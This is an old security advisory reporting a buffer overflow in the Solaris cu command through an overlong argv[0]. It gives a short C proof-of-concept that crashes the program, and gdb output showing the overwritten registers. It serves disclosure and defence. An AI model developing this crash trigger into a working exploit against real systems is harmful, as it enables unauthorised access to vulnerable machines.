[ SOURCE: http://www.secureroot.com/security/advisories/9798441358.html ]

Description



The /usr/bin/cu command contains a buffer overflow, the problem occurs

when

it copy his own name ( argv[0] ) to an internal variable without

checking

out its lenght and this causes the overflow.



Vulnerable Versions



Sun Solaris 2.4

Sun Solaris 2.5

Sun Solaris 2.5.1

Sun Solaris 2.6

Sun Solaris 2.7



(Dont know about Solaris 2.8)



Technical Description



#include <stdio.h>



void main(int argc,char **argv)

{

char *buf;



buf = (char *) malloc(atoi(argv[1])*sizeof(char));

memset(buf,0x41,atoi(argv[1])-1);

buf[atoi(argv[1])-1]=0;

execl("/usr/bin/cu",buf,(char *)0);

}



$ uname -a

SunOS tomy 5.5.1 Generic_103640-34 sun4m sparc SUNW,SPARCstation-5



$ ./cu-demo 4000

Segmentation Fault (core dumped)



$ gdb ./cu-demo --core=core



GNU gdb 4.17

Copyright 1998 Free Software Foundation, Inc.

GDB is free software, covered by the GNU General Public License, and you

are

welcome to change it and/or distribute copies of it under certain

conditions.

Type "show copying" to see the conditions.

There is absolutely no warranty for GDB.  Type "show warranty" for

details.

This GDB was configured as "sparc-sun-solaris2.5.1"...

warning: core file may not match specified executable file.

Core was generated by

`AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

AAAAAAAAAAAAAAAAAAAAAA'.

Program terminated with signal 11, Segmentation Fault.

#0  0xef62901c in ?? ()

(gdb) info registers

g0             0x0      0

g1             0xef628d24       -278754012

g2             0x0      0

g3             0x0      0

g4             0x0      0

g5             0x0      0

g6             0x0      0

g7             0x0      0

o0             0x137a4  79780

o1             0xef792a88       -277271928

o2             0x0      0

o3             0x0      0

o4             0x0      0

o5             0xef792a88       -277271928

sp             0xefffecb0       -268440400

o7             0x31b48  203592

l0             0x7efefeff       2130640639

l1             0x81010100       -2130640640

l2             0xff000000       -16777216

l3             0xff0000 16711680

l4             0xff00   65280

l5             0x81010100       -2130640640

l6             0x7      7

l7             0xef7927d4       -277272620

i0             0x39000  233472

i1             0xeffffec4       -268435772

i2             0x38088  229512

i3             0x41414141       1094795585

i4             0x2f     47

i5             0x0      0

fp             0xefffecf0       -268440336

i7             0x137a4  79780

y              0x0      0

psr            0x4400086        71303302

wim            0x0      0

tbr            0x0      0

pc             0xef62901c       -278753252

npc            0xef628ffc       -278753284

fpsr           0x0      0

cpsr           0x0      0





Pablo Sor

psor@afip.gov.ar